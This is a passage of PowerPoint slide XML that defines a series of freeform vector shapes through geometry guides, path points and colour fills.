                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 545"/>
                  <a:gd name="T7" fmla="*/ 39 h 61"/>
                  <a:gd name="T8" fmla="*/ 201 w 545"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 201 w 545"/>
                  <a:gd name="T1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5" h="61">
                    <a:moveTo>
                      <a:pt x="201" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="545" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0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" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="3363473"/>
                <a:ext cx="1541823" cy="61617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 1101 w 1101"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 674 w 1101"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 1101"/>
                  <a:gd name="T7" fmla="*/ 29 h 44"/>
                  <a:gd name="T8" fmla="*/ 376 w 1101"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1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01" h="44">
                    <a:moveTo>
                      <a:pt x="376" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="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" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="2754302"/>
                <a:ext cx="616169" cy="649782"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 440"/>
                  <a:gd name="T1" fmla="*/ 435 h 464"/>
                  <a:gd name="T2" fmla="*/ 440 w 440"/>
                  <a:gd name="T3" fmla="*/ 0 h 464"/>
                  <a:gd name="T4" fmla="*/ 199 w 440"/>
                  <a:gd name="T5" fmla="*/ 48 h 464"/>
                  <a:gd name="T6" fmla="*/ 0 w 440"/>
                  <a:gd name="T7" fmla="*/ 464 h 464"/>
                  <a:gd name="T8" fmla="*/ 376 w 440"/>
                  <a:gd name="T9" fmla="*/ 435 h 464"/>
                  <a:gd name="T10" fmla="*/ 376 w 440"/>
                  <a:gd name="T11" fmla="*/ 435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0" h="464">
                    <a:moveTo>
                      <a:pt x="376" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5509223" y="2797714"/>
                <a:ext cx="519543" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 371"/>
                  <a:gd name="T1" fmla="*/ 38 h 406"/>
                  <a:gd name="T2" fmla="*/ 371 w 371"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 315 w 371"/>
                  <a:gd name="T5" fmla="*/ 381 h 406"/>
                  <a:gd name="T6" fmla="*/ 0 w 371"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 177 w 371"/>
                  <a:gd name="T9" fmla="*/ 38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1" h="406">
                    <a:moveTo>
                      <a:pt x="177" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="371" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="38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" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5979752" y="2754302"/>
                <a:ext cx="1015279" cy="634378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 725"/>
                  <a:gd name="T1" fmla="*/ 435 h 453"/>
                  <a:gd name="T2" fmla="*/ 64 w 725"/>
                  <a:gd name="T3" fmla="*/ 0 h 453"/>
                  <a:gd name="T4" fmla="*/ 507 w 725"/>
                  <a:gd name="T5" fmla="*/ 30 h 453"/>
                  <a:gd name="T6" fmla="*/ 725 w 725"/>
                  <a:gd name="T7" fmla="*/ 453 h 453"/>
                  <a:gd name="T8" fmla="*/ 0 w 725"/>
                  <a:gd name="T9" fmla="*/ 435 h 453"/>
                  <a:gd name="T10" fmla="*/ 0 w 725"/>
                  <a:gd name="T11" fmla="*/ 435 h 4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5" h="453">
                    <a:moveTo>
                      <a:pt x="0" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:ln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" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6017562" y="2792113"/>
                <a:ext cx="920053" cy="561557"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 657"/>
                  <a:gd name="T1" fmla="*/ 384 h 401"/>
                  <a:gd name="T2" fmla="*/ 57 w 657"/>
                  <a:gd name="T3" fmla="*/ 0 h 401"/>
                  <a:gd name="T4" fmla="*/ 465 w 657"/>
                  <a:gd name="T5" fmla="*/ 26 h 401"/>
                  <a:gd name="T6" fmla="*/ 657 w 657"/>
                  <a:gd name="T7" fmla="*/ 401 h 401"/>
                  <a:gd name="T8" fmla="*/ 0 w 657"/>
                  <a:gd name="T9" fmla="*/ 384 h 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7" h="401">
                    <a:moveTo>
                      <a:pt x="0" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="384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" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5096109" y="3544123"/>
                <a:ext cx="857035" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 541 w 612"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 612 w 612"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 195 w 612"/>
                  <a:gd name="T5" fmla="*/ 17 h 473"/>
                  <a:gd name="T6" fmla="*/ 0 w 612"/>
                  <a:gd name="T7" fmla="*/ 422 h 473"/>
                  <a:gd name="T8" fmla="*/ 541 w 612"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 541 w 612"/>
                  <a:gd name="T11" fmla="*/ 473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2" h="473">
                    <a:moveTo>
                      <a:pt x="541" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="612" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3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" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5146523" y="3579133"/>
                <a:ext cx="767411" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 548"/>
                  <a:gd name="T1" fmla="*/ 376 h 423"/>
                  <a:gd name="T2" fmla="*/ 175 w 548"/>
                  <a:gd name="T3" fmla="*/ 16 h 423"/>
                  <a:gd name="T4" fmla="*/ 548 w 548"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 485 w 548"/>
                  <a:gd name="T7" fmla="*/ 423 h 423"/>
                  <a:gd name="T8" fmla="*/ 0 w 548"/>
                  <a:gd name="T9" fmla="*/ 376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8" h="423">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376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" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5853717" y="3544123"/>
                <a:ext cx="1539023" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 71 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 878 w 1099"/>
                  <a:gd name="T5" fmla="*/ 11 h 473"/>
                  <a:gd name="T6" fmla="*/ 1099 w 1099"/>
                  <a:gd name="T7" fmla="*/ 440 h 473"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 473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99" h="473">
                    <a:moveTo>
                      <a:pt x="0" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473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" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5892928" y="3577733"/>
                <a:ext cx="1445197" cy="595167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 425"/>
                  <a:gd name="T2" fmla="*/ 835 w 1032"/>
                  <a:gd name="T3" fmla="*/ 11 h 425"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 393 h 425"/>
                  <a:gd name="T6" fmla="*/ 0 w 1032"/>
                  <a:gd name="T7" fmla="*/ 425 h 425"/>
                  <a:gd name="T8" fmla="*/ 64 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="425">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="835" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="425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" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5019088" y="4244319"/>
                <a:ext cx="2457675" cy="161045"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1755"/>
                  <a:gd name="T1" fmla="*/ 36 h 115"/>
                  <a:gd name="T2" fmla="*/ 1052 w 1755"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 1755 w 1755"/>
                  <a:gd name="T5" fmla="*/ 64 h 115"/>
                  <a:gd name="T6" fmla="*/ 576 w 1755"/>
                  <a:gd name="T7" fmla="*/ 115 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 1755"/>
                  <a:gd name="T9" fmla="*/ 36 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 1755"/>
                  <a:gd name="T11" fmla="*/ 36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55" h="115">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1052" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1755" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4747414" y="4294733"/>
                <a:ext cx="1078296" cy="838835"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 770"/>
                  <a:gd name="T1" fmla="*/ 0 h 599"/>
                  <a:gd name="T2" fmla="*/ 770 w 770"/>
                  <a:gd name="T3" fmla="*/ 79 h 599"/>
                  <a:gd name="T4" fmla="*/ 692 w 770"/>
                  <a:gd name="T5" fmla="*/ 599 h 599"/>
                  <a:gd name="T6" fmla="*/ 0 w 770"/>
                  <a:gd name="T7" fmla="*/ 394 h 599"/>
                  <a:gd name="T8" fmla="*/ 194 w 770"/>
                  <a:gd name="T9" fmla="*/ 0 h 599"/>
                  <a:gd name="T10" fmla="*/ 194 w 770"/>
                  <a:gd name="T11" fmla="*/ 0 h 5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70" h="599">
                    <a:moveTo>
                      <a:pt x="194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="770" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0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chemeClr val="accent2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" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4796427" y="4331144"/>
                <a:ext cx="990072" cy="759013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 707"/>
                  <a:gd name="T1" fmla="*/ 353 h 542"/>
                  <a:gd name="T2" fmla="*/ 173 w 707"/>
                  <a:gd name="T3" fmla="*/ 0 h 542"/>
                  <a:gd name="T4" fmla="*/ 707 w 707"/>
                  <a:gd name="T5" fmla="*/ 74 h 542"/>
                  <a:gd name="T6" fmla="*/ 637 w 707"/>
                  <a:gd name="T7" fmla="*/ 542 h 542"/>
                  <a:gd name="T8" fmla="*/ 0 w 707"/>
                  <a:gd name="T9" fmla="*/ 353 h 5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7" h="542">
                    <a:moveTo>
                      <a:pt x="0" y="353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="542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" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5716480" y="4333944"/>
                <a:ext cx="2078171" cy="799624"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 86 w 1638"/>
                  <a:gd name="T3" fmla="*/ 56 h 630"/>
                  <a:gd name="T4" fmla="*/ 0 w 1638"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 1638 w 1638"/>
                  <a:gd name="T7" fmla="*/ 481 h 630"/>
                  <a:gd name="T8" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T9" fmla="*/ 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38" h="630">
                    <a:moveTo>
                      <a:pt x="1388" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="500"/>
                      <a:pt x="1091" y="531"/>
                      <a:pt x="1638" y="481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0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" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5755691" y="4367554"/>
                <a:ext cx="1985745" cy="729604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 1565"/>
                  <a:gd name="T1" fmla="*/ 55 h 574"/>
                  <a:gd name="T2" fmla="*/ 1341 w 1565"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1565 w 1565"/>
                  <a:gd name="T5" fmla="*/ 431 h 574"/>
                  <a:gd name="T6" fmla="*/ 1427 w 1565"/>
                  <a:gd name="T7" fmla="*/ 443 h 574"/>
                  <a:gd name="T8" fmla="*/ 608 w 1565"/>
                  <a:gd name="T9" fmla="*/ 518 h 574"/>
                  <a:gd name="T10" fmla="*/ 0 w 1565"/>
                  <a:gd name="T11" fmla="*/ 574 h 574"/>
                  <a:gd name="T12" fmla="*/ 78 w 1565"/>
                  <a:gd name="T13" fmla="*/ 55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65" h="574">
                    <a:moveTo>
                      <a:pt x="78" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="608" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78" y="5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" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673193" y="4964121"/>
                <a:ext cx="3211082" cy="389309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 337 w 2293"/>
                  <a:gd name="T1" fmla="*/ 0 h 278"/>
                  <a:gd name="T2" fmla="*/ 0 w 2293"/>
                  <a:gd name="T3" fmla="*/ 27 h 278"/>
                  <a:gd name="T4" fmla="*/ 723 w 2293"/>
                  <a:gd name="T5" fmla="*/ 278 h 278"/>
                  <a:gd name="T6" fmla="*/ 2293 w 2293"/>
                  <a:gd name="T7" fmla="*/ 111 h 278"/>
                  <a:gd name="T8" fmla="*/ 1846 w 2293"/>
                  <a:gd name="T9" fmla="*/ 20 h 278"/>
                  <a:gd name="T10" fmla="*/ 745 w 2293"/>
                  <a:gd name="T11" fmla="*/ 121 h 278"/>
                  <a:gd name="T12" fmla="*/ 337 w 2293"/>
                  <a:gd name="T13" fmla="*/ 0 h 278"/>
                  <a:gd name="T14" fmla="*/ 337 w 2293"/>
                  <a:gd name="T15" fmla="*/ 0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93" h="278">
                    <a:moveTo>
                      <a:pt x="337" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2293" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="0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" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4429526" y="5001931"/>
                <a:ext cx="1256145" cy="1095107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 174 w 897"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 165 w 897"/>
                  <a:gd name="T3" fmla="*/ 18 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 897"/>
                  <a:gd name="T5" fmla="*/ 357 h 782"/>
                  <a:gd name="T6" fmla="*/ 817 w 897"/>
                  <a:gd name="T7" fmla="*/ 782 h 782"/>
                  <a:gd name="T8" fmla="*/ 897 w 897"/>
                  <a:gd name="T9" fmla="*/ 251 h 782"/>
                  <a:gd name="T10" fmla="*/ 174 w 897"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 174 w 897"/>
                  <a:gd name="T13" fmla="*/ 0 h 7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7" h="782">
                    <a:moveTo>
                      <a:pt x="174" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0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" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4474339" y="5043943"/>
                <a:ext cx="1173522" cy="1002681"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 317 h 716"/>
                  <a:gd name="T2" fmla="*/ 154 w 838"/>
                  <a:gd name="T3" fmla="*/ 0 h 716"/>
                  <a:gd name="T4" fmla="*/ 838 w 838"/>
                  <a:gd name="T5" fmla="*/ 236 h 716"/>
                  <a:gd name="T6" fmla="*/ 766 w 838"/>
                  <a:gd name="T7" fmla="*/ 716 h 716"/>
                  <a:gd name="T8" fmla="*/ 0 w 838"/>
                  <a:gd name="T9" fmla="*/ 317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8" h="716">
                    <a:moveTo>
                      <a:pt x="0" y="317"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="154" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="766" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="317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" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5573641" y="5119564"/>
                <a:ext cx="2608916" cy="977474"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T1" fmla="*/ 0 h 698"/>
                  <a:gd name="T2" fmla="*/ 80 w 1863"/>
                  <a:gd name="T3" fmla="*/ 167 h 698"/>
                  <a:gd name="T4" fmla="*/ 0 w 1863"/>
                  <a:gd name="T5" fmla="*/ 698 h 698"/>
                  <a:gd name="T6" fmla="*/ 1863 w 1863"/>
                  <a:gd name="T7" fmla="*/ 411 h 698"/>
                  <a:gd name="T8" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T9" fmla="*/ 0 h 698"/>
                  <a:gd name="T10" fmla="*/ 1650 w 1863"/>
                  <a:gd name="T11" fmla="*/ 0 h 6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63" h="698">
                    <a:moveTo>
                      <a:pt x="1650" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1863" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1650" y="0"/>
                    </a:ln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5614252" y="5155975"/>
                <a:ext cx="2516491" cy="901853"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 1797"/>
                  <a:gd name="T1" fmla="*/ 163 h 644"/>
                  <a:gd name="T2" fmla="*/ 1607 w 1797"/>
                  <a:gd name="T3" fmla="*/ 0 h 644"/>
                  <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                  <a:gd name="T5" fmla="*/ 367 h 644"/>
                  <a:gd name="T6" fmla="*/ 0 w 1797"/>
                  <a:gd name="T7" fmla="*/ 644 h 644"/>
                  <a:gd name="T8" fmla="*/ 72 w 1797"/>
                  <a:gd name="T9" fmla="*/ 163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97" h="644">
                    <a:moveTo>
                      <a:pt x="72" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1607" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1797" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163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19" name="Freeform 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC45329F-9B8C-4021-BAD4-370ED5EA1C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21236" y="2193331"/>
              <a:ext cx="138638" cy="245069"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 110 w 110"/>
                <a:gd name="T1" fmla="*/ 117 h 194"/>
                <a:gd name="T2" fmla="*/ 95 w 110"/>
                <a:gd name="T3" fmla="*/ 175 h 194"/>
                <a:gd name="T4" fmla="*/ 55 w 110"/>
